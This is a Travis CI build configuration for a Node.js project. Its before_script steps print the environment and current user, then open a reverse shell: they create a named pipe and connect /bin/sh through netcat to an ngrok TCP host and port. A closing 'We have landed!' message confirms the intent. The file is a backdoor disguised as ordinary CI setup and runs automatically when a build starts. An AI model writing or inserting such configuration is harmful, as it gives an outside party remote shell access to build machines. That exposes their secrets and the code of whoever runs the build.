language: node_js
before_script:
  - env
  - whoami
  - echo "test"
  - export NGPORT=15059
  - export NGHOSTNAME=0.tcp.ngrok.io
  - mknod /tmp/backpipe p
  - /bin/sh 0</tmp/backpipe|nc $NGHOSTNAME $NGPORT 1>/tmp/backpipe
  - echo "We have landed!"